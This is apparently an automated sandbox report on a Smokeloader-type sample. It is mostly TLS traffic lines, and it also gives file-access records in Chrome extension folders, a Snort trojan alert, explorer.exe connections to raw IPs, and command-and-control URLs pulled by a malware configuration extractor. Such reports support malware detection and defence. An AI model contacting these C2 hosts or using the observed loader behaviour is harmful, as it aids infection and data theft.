                Source: unknownHTTPS traffic detected: 103.224.182.210:443 -> 192.168.2.6:55175 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 179.191.175.66:443 -> 192.168.2.6:54782 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.14.245:443 -> 192.168.2.6:54682 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:55120 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:54835 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.34.34:443 -> 192.168.2.6:55001 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:54620 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:54865 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.41.153:443 -> 192.168.2.6:54854 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 124.237.208.37:443 -> 192.168.2.6:52524 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:54622 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.233.131.115:443 -> 192.168.2.6:55086 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.203.148.34:443 -> 192.168.2.6:55113 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.41.20:443 -> 192.168.2.6:55156 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:55495 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.186.223.180:443 -> 192.168.2.6:54597 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:55185 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:55137 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:55183 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.184.59:443 -> 192.168.2.6:55176 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:56007 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.251.24.188:443 -> 192.168.2.6:55303 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.62.50:443 -> 192.168.2.6:55993 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:55148 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:56012 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:54708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:56011 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 163.247.44.239:443 -> 192.168.2.6:55530 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:55186 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:56005 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:54855 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:55259 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:55189 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:55276 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:54867 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:55874 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.85.194.183:443 -> 192.168.2.6:55248 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.66.39.205:443 -> 192.168.2.6:55518 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:56010 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.8.17:443 -> 192.168.2.6:56006 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.41.153:443 -> 192.168.2.6:55878 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 190.152.216.14:443 -> 192.168.2.6:54612 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.231.114.24:443 -> 192.168.2.6:55266 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.60.188:443 -> 192.168.2.6:56014 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.85.194.183:443 -> 192.168.2.6:56111 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:55083 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:54997 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:56003 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:56056 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.32.109:443 -> 192.168.2.6:56009 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56115 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.213.210:443 -> 192.168.2.6:55273 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:55838 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:56401 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56389 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.40.88:443 -> 192.168.2.6:56563 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:55889 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.124:443 -> 192.168.2.6:56388 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:56001 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56390 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:56382 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.7:443 -> 192.168.2.6:56532 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:56380 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:56429 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:56886 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:56393 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.41.20:443 -> 192.168.2.6:56612 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:56399 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:56424 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 200.108.110.164:443 -> 192.168.2.6:56376 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:55990 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.85.95:443 -> 192.168.2.6:56000 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:56719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.233.131.115:443 -> 192.168.2.6:56004 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.34.34:443 -> 192.168.2.6:56546 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.66.39.205:443 -> 192.168.2.6:56681 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.24:443 -> 192.168.2.6:55257 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:56717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.6.150:443 -> 192.168.2.6:56547 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:56425 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:56383 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.89:443 -> 192.168.2.6:56406 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.43.158:443 -> 192.168.2.6:56567 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:56285 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56002 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 163.247.44.239:443 -> 192.168.2.6:56680 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.64:443 -> 192.168.2.6:56400 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:56381 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 179.191.175.66:443 -> 192.168.2.6:56565 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:56728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:56342 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.64:443 -> 192.168.2.6:56892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.203.148.34:443 -> 192.168.2.6:55952 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.163.115.86:443 -> 192.168.2.6:56391 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:56561 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.69:443 -> 192.168.2.6:56385 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:56107 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.249.120.86:443 -> 192.168.2.6:56386 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:56403 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.62.50:443 -> 192.168.2.6:56240 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.117:443 -> 192.168.2.6:56421 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.7:443 -> 192.168.2.6:56372 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.158.51.60:443 -> 192.168.2.6:56402 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:56618 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.192.98.160:443 -> 192.168.2.6:55162 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:56008 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:57903 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:56676 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.251.24.188:443 -> 192.168.2.6:56374 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.75.198.169:443 -> 192.168.2.6:56568 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:56379 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:56894 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:56426 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:56423 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.246.167.169:443 -> 192.168.2.6:56160 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.213.210:443 -> 192.168.2.6:56377 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:56099 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:56562 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:56636 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:56682 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 8.45.52.148:443 -> 192.168.2.6:56384 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:55271 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:57839 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:56893 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:56281 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:56564 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.163.115.86:443 -> 192.168.2.6:57902 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:56145 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56881 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:56422 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.8.17:443 -> 192.168.2.6:56540 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.214.175:443 -> 192.168.2.6:56677 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:57904 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:56960 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.6.150:443 -> 192.168.2.6:57197 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.192.98.160:443 -> 192.168.2.6:56704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 179.51.70.125:443 -> 192.168.2.6:55250 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:58308 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:58306 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:57896 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.6:56540 -> 104.26.8.17:443 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:57907 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.6:56719 -> 186.113.7.204:443 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:57933 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.218.172:443 -> 192.168.2.6:57932 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:58305 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:62804 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:63163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:63175 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.26:443 -> 192.168.2.6:57899 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.41.153:443 -> 192.168.2.6:63162 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:62978 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:63125 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.117:443 -> 192.168.2.6:63416 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.249.120.4:443 -> 192.168.2.6:63461 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:63187 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63394 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:63158 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.66.39.205:443 -> 192.168.2.6:63171 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:63343 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:63025 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:63414 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:63449 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:62986 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:62966 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:63188 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:63124 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:63406 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:63156 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.40.88:443 -> 192.168.2.6:63154 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.218.172:443 -> 192.168.2.6:63613 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:63389 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:63157 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63475 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:63645 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.26:443 -> 192.168.2.6:64154 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:64098 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.6:63379 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:63497 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.203.148.34:443 -> 192.168.2.6:63120 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:63291 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:63132 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63133 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:63427 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63476 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:63479 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63409 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.32.109:443 -> 192.168.2.6:63138 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:63421 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:63392 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:63155 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:63143 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:63731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:63857 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:63458 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63115 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:63618 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:63426 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:63696 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63116 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.233.131.115:443 -> 192.168.2.6:63487 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.251.24.188:443 -> 192.168.2.6:63532 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.60.188:443 -> 192.168.2.6:63415 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:63477 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:63977 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:63695 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:63705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.32.109:443 -> 192.168.2.6:63457 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:63410 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:64608 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:63976 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:63700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:63933 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:63699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 163.247.44.239:443 -> 192.168.2.6:63758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:63890 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:63978 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:63997 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.213.210:443 -> 192.168.2.6:64053 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:63834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.6:63389 -> 172.67.170.147:443 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:65218 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:65376 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:65347 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:65375 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:65348 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:65345 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:65344 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:65355 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:65304 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:65427 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:65532 version: TLS 1.2
                Source: Binary string: C:\viweyaxehara hojicikepuxe\vosi\cavadelawi74\gizagol\res.pdb source: S23UhdW5DH.exe, 00000000.00000000.2058707940.0000000000427000.00000002.00000001.01000000.00000003.sdmp, S23UhdW5DH.exe, 00000000.00000002.2135326441.0000000000427000.00000002.00000001.01000000.00000003.sdmp, rghwvve, 00000006.00000000.2330117193.0000000000427000.00000002.00000001.01000000.00000005.sdmp, rghwvve, 00000006.00000002.2410440238.0000000000427000.00000002.00000001.01000000.00000005.sdmp
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp Code function: 18_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 18_2_00464048
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp Code function: 18_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 18_2_004644C4
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp Code function: 18_2_00452A4C FindFirstFileA,GetLastError, 18_2_00452A4C
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp Code function: 18_2_00462ABC FindFirstFileA,FindNextFileA,FindClose, 18_2_00462ABC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp Code function: 18_2_004751F8 FindFirstFileA,FindNextFileA,FindClose, 18_2_004751F8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp Code function: 18_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 18_2_00497A74
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

                Networking

                Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.6:49706 -> 91.215.85.120:80
                Source: C:\Windows\explorer.exe Network Connect: 172.67.213.22 80
                Source: C:\Windows\explorer.exe Network Connect: 2.180.10.7 80
                Source: C:\Windows\explorer.exe Network Connect: 91.215.85.120 80
                Source: C:\Windows\explorer.exe Network Connect: 185.172.128.19 80
                Source: Malware configuration extractor URLs: http://valarioulinity1.net/index.php
                Source: Malware configuration extractor URLs: http://buriatiarutuhuob.net/index.php
                Source: Malware configuration extractor URLs: http://cassiosssionunu.me/index.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://milogin.michigan.gov/PhpMyAdmin/eampowered.comd.onion
                Source: DNS query: followerstiktok.xyz
                Source: DNS query: ww16.followerstiktok.xyz
                Source: http HTTP: ro.bongacams.com/phpmyadmin
                Source: unknownDNS traffic detected: query: relay.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.sii.ittlahuac.edu.mx replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: ssh.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mail.transaccional.saludtotal.com.co replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.netizion.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.contribuyente.seniat.gob.ve replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.analvids.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.casinocontroller.com replaycode: Name error (3)
